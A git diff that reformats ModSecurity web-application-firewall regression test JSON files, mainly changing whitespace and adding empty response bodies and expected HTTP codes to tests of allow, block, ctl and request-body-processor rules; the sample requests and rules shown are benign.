399 +- test/test-cases/regression/issue-2111.json | 56 +- test/test-cases/regression/issue-2196.json | 54 +- test/test-cases/regression/issue-2296.json | 681 +- .../regression/issue-2423-msg-in-chain.json | 196 +- test/test-cases/regression/issue-2427.json | 114 +- test/test-cases/regression/issue-3340.json | 12 +- test/test-cases/regression/issue-394.json | 78 +- test/test-cases/regression/issue-849.json | 40 +- test/test-cases/regression/issue-960.json | 208 +- .../misc-variable-under-quotes.json | 115 +- test/test-cases/regression/misc.json | 43 +- .../regression/offset-variable.json | 2639 +++++--- .../operator-UnconditionalMatch.json | 51 +- .../regression/operator-detectsqli.json | 51 +- .../regression/operator-detectxss.json | 53 +- .../regression/operator-fuzzyhash.json | 358 +- .../regression/operator-inpectFile.json | 564 +- .../regression/operator-ipMatchFromFile.json | 155 +- test/test-cases/regression/operator-pm.json | 79 +- .../regression/operator-pmfromfile.json | 15 +- test/test-cases/regression/operator-rx.json | 334 +- .../regression/operator-rxGlobal.json | 51 +- .../operator-validate-byte-range.json | 51 +- .../regression/operator-verifycc.json | 51 +- .../regression/operator-verifycpf.json | 51 +- .../regression/operator-verifyssn.json | 51 +- .../regression/operator-verifysvnr.json | 51 +- .../regression/request-body-parser-json.json | 337 +- .../request-body-parser-multipart-crlf.json | 103 +- .../request-body-parser-multipart.json | 5874 +++++++++-------- .../request-body-parser-xml-validade-dtd.json | 256 +- .../regression/request-body-parser-xml.json | 326 +- test/test-cases/regression/rule-920120.json | 61 +- test/test-cases/regression/rule-920200.json | 58 +- test/test-cases/regression/rule-920274.json | 52 +- .../regression/sec_component_signature.json | 32 +- test/test-cases/regression/secaction.json | 27 +- .../regression/secargumentslimit.json | 92 +- test/test-cases/regression/secmarker.json | 54 +- test/test-cases/regression/secruleengine.json | 190 +- .../regression/transformation-none.json | 54 +- .../regression/transformations.json | 56 +- test/test-cases/regression/variable-ARGS.json | 402 +- .../variable-ARGS_COMBINED_SIZE.json | 412 +- .../regression/variable-ARGS_GET.json | 364 +- .../regression/variable-ARGS_GET_NAMES.json | 115 +- .../regression/variable-ARGS_NAMES.json | 320 +- .../regression/variable-ARGS_POST.json | 156 +- .../regression/variable-ARGS_POST_NAMES.json | 277 +- .../regression/variable-AUTH_TYPE.json | 103 +- .../regression/variable-DURATION.json | 52 +- test/test-cases/regression/variable-ENV.json | 221 +- .../test-cases/regression/variable-FILES.json | 119 +- .../variable-FILES_COMBINED_SIZE.json | 63 +- .../regression/variable-FILES_NAMES.json | 63 +- .../regression/variable-FILES_SIZES.json | 63 +- .../regression/variable-FULL_REQUEST.json | 63 +- .../variable-FULL_REQUEST_LENGTH.json | 63 +- test/test-cases/regression/variable-GEO.json | 1264 ++-- .../regression/variable-HIGHEST_SEVERITY.json | 115 +- .../variable-INBOUND_DATA_ERROR.json | 120 +- .../regression/variable-MATCHED_VAR.json | 292 +- .../regression/variable-MATCHED_VARS.json | 348 +- .../variable-MATCHED_VARS_NAMES.json | 291 +- .../regression/variable-MATCHED_VAR_NAME.json | 408 +- .../regression/variable-MODSEC_BUILD.json | 52 +- .../variable-MULTIPART_CRLF_LF_LINES.json | 127 +- .../variable-MULTIPART_FILENAME.json | 127 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 92 +- .../regression/variable-MULTIPART_NAME.json | 127 +- .../variable-MULTIPART_PART_HEADERS.json | 339 +- .../variable-MULTIPART_STRICT_ERROR.json | 503 +- ...variable-MULTIPART_UNMATCHED_BOUNDARY.json | 63 +- .../variable-OUTBOUND_DATA_ERROR.json | 120 +- .../regression/variable-PATH_INFO.json | 241 +- .../regression/variable-QUERY_STRING.json | 164 +- .../regression/variable-REMOTE_ADDR.json | 116 +- .../regression/variable-REMOTE_HOST.json | 116 +- .../regression/variable-REMOTE_PORT.json | 116 +- .../regression/variable-REMOTE_USER.json | 58 +- .../variable-REQBODY_PROCESSOR.json | 211 +- .../variable-REQBODY_PROCESSOR_ERROR.json | 158 +- .../regression/variable-REQUEST_BASENAME.json | 116 +- .../regression/variable-REQUEST_BODY.json | 63 +- .../variable-REQUEST_BODY_LENGTH.json | 63 +- .../regression/variable-REQUEST_COOKIES.json | 373 +- .../variable-REQUEST_COOKIES_NAMES.json | 251 +- .../regression/variable-REQUEST_FILENAME.json | 58 +- .../regression/variable-REQUEST_HEADERS.json | 63 +- .../variable-REQUEST_HEADERS_NAMES.json | 354 +- .../regression/variable-REQUEST_LINE.json | 167 +- .../regression/variable-REQUEST_METHOD.json | 61 +- .../regression/variable-REQUEST_PROTOCOL.json | 61 +- .../regression/variable-REQUEST_URI.json | 167 +- .../regression/variable-REQUEST_URI_RAW.json | 167 +- .../regression/variable-RESPONSE_BODY.json | 39 +- .../variable-RESPONSE_CONTENT_LENGTH.json | 61 +- .../variable-RESPONSE_CONTENT_TYPE.json | 61 +- .../regression/variable-RESPONSE_HEADERS.json | 63 +- .../variable-RESPONSE_HEADERS_NAMES.json | 177 +- .../variable-RESPONSE_PROTOCOL.json | 65 +- test/test-cases/regression/variable-RULE.json | 386 +- .../regression/variable-SERVER_ADDR.json | 116 +- .../regression/variable-SERVER_NAME.json | 127 +- .../regression/variable-SERVER_PORT.json | 116 +- .../regression/variable-SESSIONID.json | 104 +- .../regression/variable-STATUS.json | 102 +- test/test-cases/regression/variable-TIME.json | 58 +- .../regression/variable-TIME_DAY.json | 58 +- .../regression/variable-TIME_EPOCH.json | 58 +- .../regression/variable-TIME_HOUR.json | 58 +- .../regression/variable-TIME_MIN.json | 58 +- .../regression/variable-TIME_MON.json | 59 +- .../regression/variable-TIME_SEC.json | 58 +- .../regression/variable-TIME_WDAY.json | 58 +- .../regression/variable-TIME_YEAR.json | 58 +- test/test-cases/regression/variable-TX.json | 340 +- .../regression/variable-UNIQUE_ID.json | 58 +- .../regression/variable-URLENCODED_ERROR.json | 412 +- .../regression/variable-USERID.json | 104 +- .../regression/variable-WEBAPPID.json | 103 +- .../variable-WEBSERVER_ERROR_LOG.json | 43 +- test/test-cases/regression/variable-XML.json | 890 +-- .../regression/variable-variation-count.json | 81 +- .../variable-variation-exclusion.json | 174 +- 195 files changed, 22639 insertions(+), 19363 deletions(-) diff --git a/test/test-cases/regression/action-allow.json b/test/test-cases/regression/action-allow.json index 357d451bca..6f1e358a79 100644 --- a/test/test-cases/regression/action-allow.json +++ b/test/test-cases/regression/action-allow.json @@ -1,98 +1,129 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (1/3)", - "expected":{ - "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "rules":[ + "expected": { + "debug_log": "Skipped rule id 'action-allow.json:3' as request trough the utilization of an `allow' action", + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow,msg:'ALLOWED',id:500065\"", "SecAction \"phase:1,deny,msg:'DENIED',id:500066\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (2/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:request,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing allow action (3/3)", - "expected":{ - "debug_log": "", - "http_code": 500 + "enabled": 1, + "version_min": 300000, + "title": "Testing allow action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 500 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"phase:1,allow:phase,msg:'ALLOWED',id:500065\"", "SecRule ARGS \"@contains value\" \"id:1,t:trim,status:500,deny,phase:3\"" diff --git a/test/test-cases/regression/action-block.json b/test/test-cases/regression/action-block.json index 239df02715..33c8fb8ceb 100644 --- a/test/test-cases/regression/action-block.json +++ b/test/test-cases/regression/action-block.json @@ -1,63 +1,86 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action without desruptive action", - "expected":{ - "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action without desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/path1", - "method":"GET" + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Line: 1. Column: 16. SecDefaultAction must specify a disruptive action." }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,status:404\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing 'block' action with desruptive action", - "expected":{ - "http_code": 400 + "enabled": 1, + "version_min": 300000, + "title": "Testing 'block' action with desruptive action", + "client": { + "ip": "200.249.12.31", + "port": 12300 }, - "client":{ - "ip":"200.249.12.31", - "port":12300 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"a.b.com", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", + "request": { + "headers": { + "Host": "a.b.com", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" }, - "uri":"/path1", - "method":"GET" + "uri": "/path1", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:1,log,block,deny,status:400\"", "SecRule REQUEST_URI \"@contains path1\" \"phase:1,block,id:5\"" diff --git a/test/test-cases/regression/action-ctl_audit_engine.json b/test/test-cases/regression/action-ctl_audit_engine.json index 3848ee7e55..de83e8b8ab 100644 --- a/test/test-cases/regression/action-ctl_audit_engine.json +++ b/test/test-cases/regression/action-ctl_audit_engine.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "www.modsecurity.org", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,14 +25,23 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?parm1=test1&parm2=test2", + "uri": "/test.pl?parm1=test1&parm2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, "expected": { "audit_log": "--A--", - "error_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/action-ctl_request_body_access.json b/test/test-cases/regression/action-ctl_request_body_access.json index a88a8a24b6..fb6b3dce18 100644 --- a/test/test-cases/regression/action-ctl_request_body_access.json +++ b/test/test-cases/regression/action-ctl_request_body_access.json @@ -1,28 +1,28 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -40,20 +40,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action" + "expected": { + "debug_log": "Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=Off\"", @@ -61,29 +62,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -101,20 +102,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim\"", @@ -122,29 +124,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -162,20 +164,21 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess Off", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=On\"", diff --git a/test/test-cases/regression/action-ctl_request_body_processor.json b/test/test-cases/regression/action-ctl_request_body_processor.json index 52cfc2e651..991b2ddf1c 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor.json +++ b/test/test-cases/regression/action-ctl_request_body_processor.json @@ -1,178 +1,199 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (1)", - "expected":{ - "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (1)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (2)", - "expected":{ - "debug_log": "Rule returned 0" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (2)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (3)", - "expected":{ - "debug_log": "XML: Failed to parse document." + { + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (3)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "not a xml" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to parse document.", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json index 2ad6093e84..cd523bc649 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json +++ b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json @@ -1,97 +1,97 @@ [ { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + 